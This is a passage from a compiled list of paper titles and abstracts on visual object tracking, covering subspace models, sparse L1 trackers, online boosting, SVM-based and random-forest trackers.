forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. --- paper_title: EigenTracking: Robust Matching and Tracking of Articulated Objects Using a View-Based Representation paper_content: This paper describes an approach for tracking rigid and articulated objects using a view-based representation. The approach builds on and extends work on eigenspace representations, robust estimation techniques, and parameterized optical flow estimation. First, we note that the least-squares image reconstruction of standard eigenspace techniques has a number of problems and we reformulate the reconstruction problem as one of robust estimation. Second we define a “subspace constancy assumption” that allows us to exploit techniques for parameterized optical flow estimation to simultaneously solve for the view of an object and the affine transformation between the eigenspace and the image. To account for large affine transformations between the eigenspace and the image we define a multi-scale eigenspace representation and a coarse-to-fine matching strategy. Finally, we use these techniques to track objects over long image sequences in which the objects simultaneously undergo both affine image motions and changes of view. In particular we use this “EigenTracking” technique to track and recognize the gestures of a moving hand. --- paper_title: On incremental and robust subspace learning paper_content: Principal Component Analysis (PCA) has been of great interest in computer vision and pattern recognition. In particular, incrementally learning a PCA model, which is computationally efficient for large-scale problems as well as adaptable to reflect the variable state of a dynamic system, is an attractive research topic with numerous applications such as adaptive background modelling and active object recognition. In addition, the conventional PCA, in the sense of least mean squared error minimisation, is susceptible to outlying measurements. To address these two important issues, we present a novel algorithm of incremental PCA, and then extend it to robust PCA. Compared with the previous studies on robust PCA, our algorithm is computationally more efficient. We demonstrate the performance of these algorithms with experimental results on dynamic background modelling and multi-view face modelling. --- paper_title: Visual tracking via adaptive structural local sparse appearance model paper_content: Sparse representation has been applied to visual tracking by finding the best candidate with minimal reconstruction error using target templates. However most sparse representation based trackers only consider the holistic representation and do not make full use of the sparse coefficients to discriminate between the target and the background, and hence may fail with more possibility when there is similar object or occlusion in the scene. In this paper we develop a simple yet robust tracking method based on the structural local sparse appearance model. This representation exploits both partial information and spatial information of the target based on a novel alignment-pooling method. The similarity obtained by pooling across the local patches helps not only locate the target more accurately but also handle occlusion. In addition, we employ a template update strategy which combines incremental subspace learning and sparse representation. This strategy adapts the template to the appearance change of the target with less possibility of drifting and reduces the influence of the occluded target template as well. Both qualitative and quantitative evaluations on challenging benchmark image sequences demonstrate that the proposed tracking algorithm performs favorably against several state-of-the-art methods. --- paper_title: Minimum error bounded efficient ℓ1 tracker with occlusion detection paper_content: Recently, sparse representation has been applied to visual tracking to find the target with the minimum reconstruction error from the target template subspace. Though effective, these L1 trackers require high computational costs due to numerous calculations for l 1 minimization. In addition, the inherent occlusion insensitivity of the l 1 minimization has not been fully utilized. In this paper, we propose an efficient L1 tracker with minimum error bound and occlusion detection which we call Bounded Particle Resampling (BPR)-L1 tracker. First, the minimum error bound is quickly calculated from a linear least squares equation, and serves as a guide for particle resampling in a particle filter framework. Without loss of precision during resampling, most insignificant samples are removed before solving the computationally expensive l 1 minimization function. The BPR technique enables us to speed up the L1 tracker without sacrificing accuracy. Second, we perform occlusion detection by investigating the trivial coefficients in the l 1 minimization. These coefficients, by design, contain rich information about image corruptions including occlusion. Detected occlusions enhance the template updates to effectively reduce the drifting problem. The proposed method shows good performance as compared with several state-of-the-art trackers on challenging benchmark sequences. --- paper_title: Visual tracking decomposition paper_content: We propose a novel tracking algorithm that can work robustly in a challenging scenario such that several kinds of appearance and motion changes of an object occur at the same time. Our algorithm is based on a visual tracking decomposition scheme for the efficient design of observation and motion models as well as trackers. In our scheme, the observation model is decomposed into multiple basic observation models that are constructed by sparse principal component analysis (SPCA) of a set of feature templates. Each basic observation model covers a specific appearance of the object. The motion model is also represented by the combination of multiple basic motion models, each of which covers a different type of motion. Then the multiple basic trackers are designed by associating the basic observation models and the basic motion models, so that each specific tracker takes charge of a certain change in the object. All basic trackers are then integrated into one compound tracker through an interactive Markov Chain Monte Carlo (IMCMC) framework in which the basic trackers communicate with one another interactively while run in parallel. By exchanging information with others, each tracker further improves its performance, which results in increasing the whole performance of tracking. Experimental results show that our method tracks the object accurately and reliably in realistic videos where the appearance and motion are drastically changing over time. --- paper_title: A bi-subspace model for robust visual tracking paper_content: The changes of the target's visual appearance often lead to tracking failure in practice. Hence, trackers need to be adaptive to non-stationary appearances to achieve robust visual tracking. However, the risk of adaptation drift is common in most existing adaptation schemes. This paper describes a bi-subspace model that stipulates the interactions of two different visual cues. The visual appearance of the target is represented by two interactive subspaces, each of which corresponds to a particular cue. The adaption of the subspaces is through the interaction of the two cues, which leads to robust tracking performance. Extensive experiments show that the proposed approach can largely alleviate adaptation drift and obtain better tracking results. --- paper_title: Non-sparse linear representations for visual tracking with online reservoir metric learning paper_content: Most sparse linear representation-based trackers need to solve a computationally expensive ii-regularized optimization problem. To address this problem, we propose a visual tracker based on non-sparse linear representations, which admit an efficient closed-form solution without sacrificing accuracy. Moreover, in order to capture the correlation information between different feature dimensions, we learn a Mahalanobis distance metric in an online fashion and incorporate the learned metric into the optimization problem for obtaining the linear representation. We show that online metric learning using proximity comparison significantly improves the robustness of the tracking, especially on those sequences exhibiting drastic appearance changes. Furthermore, in order to prevent the unbounded growth in the number of training samples for the metric learning, we design a time-weighted reservoir sampling method to maintain and update limited-sized foreground and background sample buffers for balancing sample diversity and adaptability. Experimental results on challenging videos demonstrate the effectiveness and robustness of the proposed tracker. --- paper_title: Direct appearance models paper_content: Active appearance model (AAM), which makes ingenious use of both shape and texture constraints, is a powerful tool for face modeling, alignment and facial feature extraction under shape deformations and texture variations. However, as we show through our analysis and experiments, there exist admissible appearances that are not modeled by AAM and hence cannot be reached by AAM search; also the mapping from the texture subspace to the shape subspace is many-to-one and therefore a shape should be determined entirely by the texture in it. We propose a new appearance model, called direct appearance model (DAM), without combining from shape and texture as in AAM. The DAM model uses texture information directly in the prediction of the shape and in the estimation of position and appearance (hence the name DAM). In addition, DAM predicts the new face position and appearance based on principal components of texture difference vectors, instead of the raw vectors themselves as in AAM. These lead to the following advantages over AAM: (1) DAM subspaces include admissible appearances previously unseen in AAM, (2) convergence and accuracy are improved, and (3) memory requirement is cut down to a large extent. The advantages are substantiated by comparative experimental results. --- paper_title: Active Appearance Models Revisited paper_content: Active Appearance Models (AAMs) and the closely related concepts of Morphable Models and Active Blobs are generative models of a certain visual phenomenon. Although linear in both shape and appearance, overall, AAMs are nonlinear parametric models in terms of the pixel intensities. Fitting an AAM to an image consists of minimising the error between the input image and the closest model instances i.e. solving a nonlinear optimisation problem. We propose an efficient fitting algorithm for AAMs based on the inverse compositional image alignment algorithm. We show that the effects of appearance variation during fitting can be precomputed (“projected out”) using this algorithm and how it can be extended to include a global shape normalising warp, typically a 2D similarity transformation. We evaluate our algorithm to determine which of its novel aspects improve AAM fitting performance. --- paper_title: Dynamical statistical shape priors for level set-based tracking paper_content: In recent years, researchers have proposed introducing statistical shape knowledge into level set-based segmentation methods in order to cope with insufficient low-level information. While these priors were shown to drastically improve the segmentation of familiar objects, so far the focus has been on statistical shape priors which are static in time. Yet, in the context of tracking deformable objects, it is clear that certain silhouettes (such as those of a walking person) may become more or less likely over time. In this paper, we tackle the challenge of learning dynamical statistical models for implicitly represented shapes. We show how these can be integrated as dynamical shape priors in a Bayesian framework for level set-based image sequence segmentation. We assess the effect of such shape priors "with memory" on the tracking of familiar deformable objects in the presence of noise and occlusion. We show comparisons between dynamical and static shape priors, between models of pure deformation and joint models of deformation and transformation, and we quantitatively evaluate the segmentation accuracy as a function of the noise level and of the camera frame rate. Our experiments demonstrate that level set-based segmentation and tracking can be strongly improved by exploiting the temporal correlations among consecutive silhouettes which characterize deforming shapes --- paper_title: Robust Visual Tracking using 1 Minimization paper_content: In this paper we propose a robust visual tracking method by casting tracking as a sparse approximation problem in a particle filter framework. In this framework, occlusion, corruption and other challenging issues are addressed seamlessly through a set of trivial templates. Specifically, to find the tracking target at a new frame, each target candidate is sparsely represented in the space spanned by target templates and trivial templates. The sparsity is achieved by solving an � 1-regularized least squares problem. Then the candidate with the smallest projection error is taken as the tracking target. After that, tracking is continued using a Bayesian state inference framework in which a particle filter is used for propagating sample distributions over time. Two additional components further improve the robustness of our approach: 1) the nonnegativity constraints that help filter out clutter that is similar to tracked targets in reversed intensity patterns, and 2) a dynamic template update scheme that keeps track of the most representative templates throughout the tracking procedure. We test the proposed approach on five challenging sequences involving heavy occlusions, drastic illumination changes, and large pose variations. The proposed approach shows excellent performance in comparison with three previously proposed trackers. --- paper_title: Real time robust L1 tracker using accelerated proximal gradient approach paper_content: Recently sparse representation has been applied to visual tracker by modeling the target appearance using a sparse approximation over a template set, which leads to the so-called L1 trackers as it needs to solve an l 1 norm related minimization problem for many times. While these L1 trackers showed impressive tracking accuracies, they are very computationally demanding and the speed bottleneck is the solver to l 1 norm minimizations. This paper aims at developing an L1 tracker that not only runs in real time but also enjoys better robustness than other L1 trackers. In our proposed L1 tracker, a new l 1 norm related minimization model is proposed to improve the tracking accuracy by adding an l 1 norm regularization on the coefficients associated with the trivial templates. Moreover, based on the accelerated proximal gradient approach, a very fast numerical solver is developed to solve the resulting l 1 norm related minimization problem with guaranteed quadratic convergence. The great running time efficiency and tracking accuracy of the proposed tracker is validated with a comprehensive evaluation involving eight challenging sequences and five alternative state-of-the-art trackers. --- paper_title: Online learning of probabilistic appearance manifolds for video-based recognition and tracking paper_content: This paper presents an online learning algorithm to construct from video sequences an image-based representation that is useful for recognition and tracking. For a class of objects (e.g., human faces), a generic representation of the appearances of the class is learned off-line. From video of an instance of this class (e.g., a particular person), an appearance model is incrementally learned on-line using the prior generic model and successive frames from the video. More specifically, both the generic and individual appearances are represented as an appearance manifold that is approximated by a collection of sub-manifolds (named pose manifolds) and the connectivity between them. In turn, each sub-manifold is approximated by a low-dimensional linear sub-space while the connectivity is modeled by transition probabilities between pairs of sub-manifolds. We demonstrate that our online learning algorithm constructs an effective representation for face tracking, and its use in video-based face recognition compares favorably to the representation constructed with a batch technique. --- paper_title: On robustness of on-line boosting - a competitive study paper_content: On-line boosting is one of the most successful on-line algorithms and thus applied in many computer vision applications. However, even though boosting, in general, is well known to be susceptible to class-label noise, on-line boosting is mostly applied to self-learning applications such as visual object tracking, where label-noise is an inherent problem. This paper studies the robustness of on-line boosting. Since mainly the applied loss function determines the behavior of boosting, we propose an on-line version of GradientBoost, which allows us to plug in arbitrary loss-functions into the on-line learner. Hence, we can easily study the importance and the behavior of different loss-functions. We evaluate various on-line boosting algorithms in form of a competitive study on standard machine learning problems as well as on common computer vision applications such as tracking and autonomous training of object detectors. Our results show that using on-line Gradient-Boost with robust loss functions leads to superior results in all our experiments. --- paper_title: Gradient Feature Selection for Online Boosting paper_content: Boosting has been widely applied in computer vision, especially after Viola and Jones's seminal work. The marriage of rectangular features and integral-image- enabled fast computation makes boosting attractive for many vision applications. However, this popular way of applying boosting normally employs an exhaustive feature selection scheme from a very large hypothesis pool, which results in a less-efficient learning process. Furthermore, this poses additional constraint on applying boosting in an onine fashion, where feature re-selection is often necessary because of varying data characteristic, but yet impractical due to the huge hypothesis pool. This paper proposes a gradient-based feature selection approach. Assuming a generally trained feature set and labeled samples are given, our approach iteratively updates each feature using the gradient descent, by minimizing the weighted least square error between the estimated feature response and the true label. In addition, we integrate the gradient-based feature selection with an online boosting framework. This new online boosting algorithm not only provides an efficient way of updating the discriminative feature set, but also presents a unified objective for both feature selection and weak classifier updating. Experiments on the person detection and tracking applications demonstrate the effectiveness of our proposal. --- paper_title: Online bagging and boosting paper_content: Bagging and boosting are two of the most well-known ensemble learning methods due to their theoretical performance guarantees and strong experimental results. However, these algorithms have been used mainly in batch mode, i.e., they require the entire training set to be available at once and, in some cases, require random access to the data. In this paper, we present online versions of bagging and boosting that require only one pass through the training data. We build on previously presented work by describing some theoretical results. We also compare the online and batch algorithms experimentally in terms of accuracy and running time. --- paper_title: Online selecting discriminative tracking features using particle filter paper_content: The paper proposes a method to keep the tracker robust to background clutters by online selecting discriminative features from a large feature space. Furthermore, the feature selection procedure is embedded into the particle filtering process with the aid of existed "background" particles. Feature values from background patches and object observations are sampled during tracking and Fisher discriminant is employed to rank the classification capacity of each feature based on sampled values. Top-ranked discriminative features are selected into the appearance model and simultaneously invalid features are removed out to adjust the object representation adaptively. The implemented tracker with online discriminative feature selection module embedded shows promising results on experimental video sequences. --- paper_title: Robust visual tracking via transfer learning paper_content: In this paper, we propose a boosting based tracking framework using transfer learning. To deal with complex appearance variations, the proposed tracking framework tries to utilize discriminative information from previous frames to conduct the tracking task in the current frame, and thus transfers some prior knowledge from the previous source data domain to the current target data domain, resulting in a high discriminative tracker for distinguishing the object from the background. The proposed tracking system has been tested on several challenging sequences. Experimental results demonstrate the effectiveness of the proposed tracking framework. --- paper_title: Dynamic ensemble for target tracking paper_content: On-line boosting is a recent breakthrough in the ma-chine learning literature that has opened new possibil-ities in many diverse elds. Instead of generating astatic strong classi er o -line, the classi er can be builton-the-y on incoming samples. This has been success-fully exploited in treating computer vision tasks such astracking as a classi cation problem thus providing anintriguing new perspective to an old subject. Knownsolutions to the on-line boosting problem rely on a xednumber of weak classi ers. The rst main contribu-tion of this paper removes this limitation and showshow a dynamic ensemble can better address the trackingproblem by providing increased robustness. The secondproposed novelty consists in a mechanism for detect-ing scale changes of tracked targets. Promising resultsare shown on publicly available and our own video se-quences. --- paper_title: Robust real-time object detection paper_content: This paper describes a visual object detection framework that is capable of processing images extremely rapidly while achieving high detection rates. There are three key contributions. The first is the introduction of a new image representation called the “Integral Image” which allows the features used by our detector to be computed very quickly. The second is a learning algorithm, based on AdaBoost, which selects a small number of critical visual features and yields extremely efficient classifiers [4]. The third contribution is a method for combining classifiers in a “cascade” which allows background regions of the image to be quickly discarded while spending more computation on promising object-like regions. A set of experiments in the domain of face detection are presented. The system yields face detection performance comparable to the best previous systems [16, 11, 14, 10, 1]. Implemented on a conventional desktop, face detection proceeds at 15 frames per second. Author email: fPaul.Viola,[email protected] c Compaq Computer Corporation, 2001 This work may not be copied or reproduced in whole or in part for any commercial purpose. Permission to copy in whole or in part without payment of fee is granted for nonprofit educational and research purposes provided that all such whole or partial copies include the following: a notice that such copying is by permission of the Cambridge Research Laboratory of Compaq Computer Corporation in Cambridge, Massachusetts; an acknowledgment of the authors and individual contributors to the work; and all applicable portions of the copyright notice. Copying, reproducing, or republishing for any other purpose shall require a license with payment of fee to the Cambridge Research Laboratory. All rights reserved. CRL Technical reports are available on the CRL’s web page at http://crl.research.compaq.com. Compaq Computer Corporation Cambridge Research Laboratory One Cambridge Center Cambridge, Massachusetts 02142 USA --- paper_title: A Boosted Particle Filter: Multitarget Detection and Tracking paper_content: The problem of tracking a varying number of non-rigid objects has two major difficulties. First, the observation models and target distributions can be highly non-linear and non-Gaussian. Second, the presence of a large, varying number of objects creates complex interactions with overlap and ambiguities. To surmount these difficulties, we introduce a vision system that is capable of learning, detecting and tracking the objects of interest. The system is demonstrated in the context of tracking hockey players using video sequences. Our approach combines the strengths of two successful algorithms: mixture particle filters and Adaboost. The mixture particle filter [17] is ideally suited to multi-target tracking as it assigns a mixture component to each player. The crucial design issues in mixture particle filters are the choice of the proposal distribution and the treatment of objects leaving and entering the scene. Here, we construct the proposal distribution using a mixture model that incorporates information from the dynamic models of each player and the detection hypotheses generated by Adaboost. The learned Adaboost proposal distribution allows us to quickly detect players entering the scene, while the filtering process enables us to keep track of the individual players. The result of interleaving Adaboost with mixture particle filters is a simple, yet powerful and fully automatic multiple object tracking system. --- paper_title: Ensemble Tracking paper_content: We consider tracking as a binary classification problem, where an ensemble of weak classifiers is trained online to distinguish between the object and the background. The ensemble of weak classifiers is combined into a strong classifier using AdaBoost. The strong classifier is then used to label pixels in the next frame as either belonging to the object or the background, giving a confidence map. The peak of the map, and hence the new position of the object, is found using mean shift. Temporal coherence is maintained by updating the ensemble with new weak classifiers that are trained online during tracking. We show a realization of this method and demonstrate it on several video sequences. --- paper_title: Functional Gradient Techniques for Combining Hypotheses paper_content: This chapter contains sections titled: Introduction, Optimizing Cost Functions of the Margin, A Gradient Descent View of Voting Methods, Theoretically Motivated Cost Functions, Convergence Results, Experiments, Conclusions, Acknowledgments --- paper_title: Online multiple instance learning with no regret paper_content: Multiple instance (MI) learning is a recent learning paradigm that is more flexible than standard supervised learning algorithms in the handling of label ambiguity. It has been used in a wide range of applications including image classification, object detection and object tracking. Typically, MI algorithms are trained in a batch setting in which the whole training set has to be available before training starts. However, in applications such as tracking, the classifier needs to be trained continuously as new frames arrive. Motivated by the empirical success of a batch MI algorithm called MILES, we propose in this paper an online MI learning algorithm that has an efficient online update procedure and also performs joint feature selection and classification as MILES. Besides, while existing online MI algorithms lack theoretical properties, we prove that the proposed online algorithm has a (cumulative) regret of O(√T), where T is the number of iterations. In other words, the average regret goes to zero asymptotically and it thus achieves the same performance as the best solution in hindsight. Experiments on a number of MI classification and object tracking data sets demonstrate encouraging results. --- paper_title: A robust boosting tracker with minimum error bound in a co-training framework paper_content: The varying object appearance and unlabeled data from new frames are always the challenging problem in object tracking. Recently machine learning methods are widely applied to tracking, and some online and semi-supervised algorithms are developed to handle these difficulties. In this paper, we consider tracking as a classification problem and present a novel tracking method based on boosting in a co-training framework. The proposed tracker can be online updated and boosted with multi-view weak hypothesis. The most important contribution of this paper is that we find a boosting error upper bound in a co-training framework to guide the novel tracker construction. In theory, the proposed tracking method is proved to minimize this error bound. In experiments, the accuracy rate of foreground/ background classification and the tracking results are both served as evaluation metrics. Experimental results show good performance of proposed novel tracker on challenging sequences. --- paper_title: Semi-Supervised On-line Boosting for Robust Tracking paper_content: Recently, on-line adaptation of binary classifiers for tracking have been investigated. On-line learning allows for simple classifiers since only the current view of the object from its surrounding background needs to be discriminiated. However, on-line adaption faces one key problem: Each update of the tracker may introduce an error which, finally, can lead to tracking failure (drifting). The contribution of this paper is a novel on-line semi-supervised boosting method which significantly alleviates the drifting problem in tracking applications. This allows to limit the drifting problem while still staying adaptive to appearance changes. The main idea is to formulate the update process in a semi-supervised fashion as combined decision of a given prior and an on-line classifier. This comes without any parameter tuning. In the experiments, we demonstrate real-time tracking of our SemiBoost tracker on several challenging test sequences where our tracker outperforms other on-line tracking methods. --- paper_title: On-line semi-supervised multiple-instance boosting paper_content: A recent dominating trend in tracking called tracking-by-detection uses on-line classifiers in order to redetect objects over succeeding frames. Although these methods usually deliver excellent results and run in real-time they also tend to drift in case of wrong updates during the self-learning process. Recent approaches tackled this problem by formulating tracking-by-detection as either one-shot semi-supervised learning or multiple instance learning. Semi-supervised learning allows for incorporating priors and is more robust in case of occlusions while multiple-instance learning resolves the uncertainties where to take positive updates during tracking. In this work, we propose an on-line semi-supervised learning algorithm which is able to combine both of these approaches into a coherent framework. This leads to more robust results than applying both approaches separately. Additionally, we introduce a combined loss that simultaneously uses labeled and unlabeled samples, which makes our tracker more adaptive compared to previous on-line semi-supervised methods. Experimentally, we demonstrate that by using our semi-supervised multiple-instance approach and utilizing robust learning methods, we are able to outperform state-of-the-art methods on various benchmark tracking videos. --- paper_title: Visual tracking with online Multiple Instance Learning paper_content: In this paper, we address the problem of learning an adaptive appearance model for object tracking. In particular, a class of tracking techniques called “tracking by detection” have been shown to give promising results at real-time speeds. These methods train a discriminative classifier in an online manner to separate the object from the background. This classifier bootstraps itself by using the current tracker state to extract positive and negative examples from the current frame. Slight inaccuracies in the tracker can therefore lead to incorrectly labeled training examples, which degrades the classifier and can cause further drift. In this paper we show that using Multiple Instance Learning (MIL) instead of traditional supervised learning avoids these problems, and can therefore lead to a more robust tracker with fewer parameter tweaks. We present a novel online MIL algorithm for object tracking that achieves superior results with real-time performance. --- paper_title: Robust tracking with weighted online structured learning paper_content: Robust visual tracking requires constant update of the target appearance model, but without losing track of previous appearance information. One of the difficulties with the online learning approach to this problem has been a lack of flexibility in the modelling of the inevitable variations in target and scene appearance over time. The traditional online learning approach to the problem treats each example equally, which leads to previous appearances being forgotten too quickly and a lack of emphasis on the most current observations. Through analysis of the visual tracking problem, we develop instead a novel weighted form of online risk which allows more subtlety in its representation. However, the traditional online learning framework does not accommodate this weighted form. We thus also propose a principled approach to weighted online learning using weighted reservoir sampling and provide a weighted regret bound as a theoretical guarantee of performance. The proposed novel online learning framework can handle examples with different importance weights for binary, multiclass, and even structured output labels in both linear and non-linear kernels. Applying the method to tracking results in an algorithm which is both efficient and accurate even in the presence of severe appearance changes. Experimental results show that the proposed tracker outperforms the current state-of-the-art. --- paper_title: Co-Tracking Using Semi-Supervised Support Vector Machines paper_content: This paper treats tracking as a foreground/background classification problem and proposes an online semi- supervised learning framework. Initialized with a small number of labeled samples, semi-supervised learning treats each new sample as unlabeled data. Classification of new data and updating of the classifier are achieved simultaneously in a co-training framework. The object is represented using independent features and an online support vector machine (SVM) is built for each feature. The predictions from different features are fused by combining the confidence map from each classifier using a classifier weighting method which creates a final classifier that performs better than any classifier based on a single feature. The semi-supervised learning approach then uses the output of the combined confidence map to generate new samples and update the SVMs online. With this approach, the tracker gains increasing knowledge of the object and background and continually improves itself over time. Compared to other discriminative trackers, the online semi-supervised learning approach improves each individual classifier using the information from other features, thus leading to a more robust tracker. Experiments show that this framework performs better than state-of-the-art tracking algorithms on challenging sequences. --- paper_title: Robust tracking via weakly supervised ranking SVM paper_content: Appearance model is a key component of tracking algorithms. Most existing approaches utilize the object information contained in the current and previous frames to construct the object appearance model and locate the object with the model in frame t + 1. This method may work well if the object appearance just fluctuates in short time intervals. Nevertheless, suboptimal locations will be generated in frame t + 1 if the visual appearance changes substantially from the model. Then, continuous changes would accumulate errors and finally result in a tracking failure. To copy with this problem, in this paper we propose a novel algorithm — online Laplacian ranking support vector tracker (LRSVT) — to robustly locate the object. The LRSVT incorporates the labeled information of the object in the initial and the latest frames to resist the occlusion and adapt to the fluctuation of the visual appearance, and the weakly labeled information from frame t + 1 to adapt to substantial changes of the appearance. Extensive experiments on public benchmark sequences show the superior performance of LRSVT over some state-of-the-art tracking algorithms. --- paper_title: Support Vector Tracking paper_content: Support Vector Tracking (SVT) integrates the Support Vector Machine (SVM) classifier into an optic-flow based tracker. Instead of minimizing an intensity difference function between successive frames, SVT maximizes the SVM classification score. To account for large motions between successive frames, we build pyramids from the support vectors and use a coarse-to-fine approach in the classification stage. We show results of using a homogeneous quadratic polynomial kernel-SVT for vehicle tracking in image sequences. --- paper_title: Human tracking by multiple kernel boosting with locality affinity constraints paper_content: In this paper, we incorporate the concept of Multiple Kernel Learning (MKL) algorithm, which is used in object categorization, into human tracking field. For efficiency, we devise an algorithm called Multiple Kernel Boosting (MKB), instead of directly adopting MKL. MKB aims to find an optimal combination of many single kernel SVMs focusing on different features and kernels by boosting technique. Besides, we apply Locality Affinity Constraints (LAC) to each selected SVM. LAC is computed from the distribution of support vectors of respective SVM, recording the underlying locality of training data. An update scheme to reselect good SVMs, adjust their weights and recalculate LAC is also included. Experiments on standard and our own testing sequences show that our MKB tracking outperforms some other state-of-the-art algorithms in handling various conditions. --- paper_title: On-line ensemble SVM for robust object tracking paper_content: In this paper, we present a novel visual object tracking algorithm based on ensemble of linear SVM classifiers. There are two main contributions in this paper. First of all, we propose a simple yet effective way for on-line updating linear SVM classifier, where useful "Key Frames" of target are automatically selected as support vectors. Secondly, we propose an on-line ensemble SVM tracker, which can effectively handle target appearance variation. The proposed algorithm makes better usage of history information, which leads to better discrimination of target and the surrounding background. The proposed algorithm is tested on many video clips including some public available ones. Experimental results show the robustness of our proposed algorithm, especially under large appearance change during tracking. --- paper_title: Sparse Bayesian learning for efficient visual tracking paper_content: This paper extends the use of statistical learning algorithms for object localization. It has been shown that object recognizers using kernel-SVMs can be elegantly adapted to localization by means of spatial perturbation of the SVM. While this SVM applies to each frame of a video independently of other frames, the benefits of temporal fusion of data are well-known. This is addressed here by using a fully probabilistic relevance vector machine (RVM) to generate observations with Gaussian distributions that can be fused over time. Rather than adapting a recognizer, we build a displacement expert which directly estimates displacement from the target region. An object detector is used in tandem, for object verification, providing the capability for automatic initialization and recovery. This approach is demonstrated in real-time tracking systems where the sparsity of the RVM means that only a fraction of CPU time is required to track at frame rate. An experimental evaluation compares this approach to the state of the art showing it to be a viable method for long-term region tracking. --- paper_title: On feature combination and multiple kernel learning for object tracking paper_content: This paper presents a new method for object tracking based on multiple kernel learning (MKL). MKL is used to learn an optimal combination of χ2 kernels and Gaussian kernels, each type of which captures a different feature. Our features include the color information and spatial pyramid histogram (SPH) based on global spatial correspondence of the geometric distribution of visual words. We propose a simple effective way for on-line updating MKL classifier, where useful tracking objects are automatically selected as support vectors. The algorithm handle target appearance variation, and makes better usage of history information, which leads to better discrimination of target and the surrounding background. The experiments on real world sequences demonstrate that our method can track objects accurately and robustly especially under partial occlusion and large appearance change. --- paper_title: Struck: Structured output tracking with kernels paper_content: Adaptive tracking-by-detection methods are widely used in computer vision for tracking arbitrary objects. Current approaches treat the tracking problem as a classification task and use online learning techniques to update the object model. However, for these updates to happen one needs to convert the estimated object position into a set of labelled training examples, and it is not clear how best to perform this intermediate step. Furthermore, the objective for the classifier (label prediction) is not explicitly coupled to the objective for the tracker (accurate estimation of object position). In this paper, we present a framework for adaptive visual object tracking based on structured output prediction. By explicitly allowing the output space to express the needs of the tracker, we are able to avoid the need for an intermediate classification step. Our method uses a kernelized structured output support vector machine (SVM), which is learned online to provide adaptive tracking. To allow for real-time application, we introduce a budgeting mechanism which prevents the unbounded growth in the number of support vectors which would otherwise occur during tracking. Experimentally, we show that our algorithm is able to outperform state-of-the-art trackers on various benchmark videos. Additionally, we show that we can easily incorporate additional features and kernels into our framework, which results in increased performance. --- paper_title: Implementing Decision Trees and Forests on a GPU paper_content: We describe a method for implementing the evaluation and training of decision trees and forests entirely on a GPU, and show how this method can be used in the context of object recognition. --- paper_title: Multiple-instance learning with randomized trees paper_content: Multiple-instance learning (MIL) allows for training classifiers from ambiguously labeled data. In computer vision, this learning paradigm has been recently used in many applications such as object classification, detection and tracking. This paper presents a novel multiple-instance learning algorithmfor randomized trees called MIForests. Randomized trees are fast, inherently parallel and multi-class and are thus increasingly popular in computer vision. MIForest combine the advantages of these classifiers with the flexibility of multiple instance learning. In order to leverage the randomized trees for MIL, we define the hidden class labels inside target bags as random variables. These random variables are optimized by training random forests and using a fast iterative homotopy method for solving the non-convex optimization problem. Additionally, most previously proposed MIL approaches operate in batch or off-line mode and thus assume access to the entire training set. This limits their applicability in scenarios where the data arrives sequentially and in dynamic environments.We show that MIForests are not limited to off-line problems and present an on-line extension of our approach. In the experiments, we evaluate MIForests on standard visual MIL benchmark datasets where we achieve state-of-the-art results while being faster than previous approaches and being able to inherently solve multi-class problems. The on-line version of MIForests is evaluated on visual object tracking where we outperform the state-of-the-art method based on boosting. --- paper_title: On-Line Random Naive Bayes for Tracking paper_content: Randomized learning methods (i.e., Forests or Ferns) have shown excellent capabilities for various computer vision applications. However, it was shown that the tree structure in Forests can be replaced by even simpler structures, e.g., Random Naive Bayes classifiers, yielding similar performance. The goal of this paper is to benefit from these findings to develop an efficient on-line learner. Based on the principals of on-line Random Forests, we adapt the Random Naive Bayes classifier to the on-line domain. For that purpose, we propose to use on-line histograms as weak learners, which yield much better performance than simple decision stumps. Experimentally we show, that the approach is applicable to incremental learning on machine learning datasets. Additionally, we propose to use an iir filtering-like forgetting function for the weak learners to enable adaptivity and evaluate our classifier on the task of tracking by detection. --- paper_title: Keypoint recognition using randomized trees paper_content: In many 3D object-detection and pose-estimation problems, runtime performance is of critical importance. However, there usually is time to train the system, which we would show to be very useful. Assuming that several registered images of the target object are available, we developed a keypoint-based approach that is effective in this context by formulating wide-baseline matching of keypoints extracted from the input images to those found in the model images as a classification problem. This shifts much of the computational burden to a training phase, without sacrificing recognition performance. As a result, the resulting algorithm is robust, accurate, and fast-enough for frame-rate performance. This reduction in runtime computational complexity is our first contribution. Our second contribution is to show that, in this context, a simple and fast keypoint detector suffices to support detection and tracking even under large perspective and scale variations. While earlier methods require a detector that can be expected to produce very repeatable results, in general, which usually is very time-consuming, we simply find the most repeatable object keypoints for the specific target object during the training phase. We have incorporated these ideas into a real-time system that detects planar, nonplanar, and deformable objects. It then estimates the pose of the rigid ones and the deformations of the others --- paper_title: Random Forests paper_content: Random forests are a combination of tree predictors such that each tree depends on the values of a random vector sampled independently and with the same distribution for all trees in the forest. The generalization error for forests converges a.s. to a limit as the number of trees in the forest becomes large. The generalization error of a forest of tree classifiers depends on the strength of the individual trees in the forest and the correlation between them. Using a random selection of features to split each node yields error rates that compare favorably to Adaboost (Y. Freund & R. Schapire, Machine Learning: Proceedings of the Thirteenth International conference, aaa, 148–156), but are more robust with respect to noise. Internal estimates monitor error, strength, and correlation and these are used to show the response to increasing the number of features used in the splitting. Internal estimates are also used to measure variable importance. These ideas are also applicable to regression. --- paper_title: PROST: Parallel robust online simple tracking paper_content: Tracking-by-detection is increasingly popular in order to tackle the visual tracking problem. Existing adaptive methods suffer from the drifting problem, since they rely on self-updates of an on-line learning method. In contrast to previous work that tackled this problem by employing semi-supervised or multiple-instance learning, we show that augmenting an on-line learning method with complementary tracking approaches can lead to more stable results. In particular, we use a simple template model as a non-adaptive and thus stable component, a novel optical-flow-based mean-shift tracker as highly adaptive element and an on-line random forest as moderately adaptive appearance-based learner. We combine these three trackers in a cascade. All of our components run on GPUs or similar multi-core systems, which allows for real-time performance. We show the superiority of our system over current state-of-the-art tracking methods in several experiments on publicly available data. --- paper_title: Robust Tracking Using Foreground-Background Texture Discrimination paper_content: This paper conceives of tracking as the developing distinction of a foreground against the background. In this manner, fast changes in the object or background appearance can be dealt with. When modelling the target alone (and not its distinction from the background), changes of lighting or changes of viewpoint can invalidate the internal target model. As the main contribution, we propose a new model for the detection of the target using foreground/background texture discrimination. The background is represented as a set of texture patterns. During tracking, the algorithm maintains a set of discriminant functions each distinguishing one pattern in the object region from background patterns in the neighborhood of the object. The idea is to train the foreground/background discrimination dynamically, that is 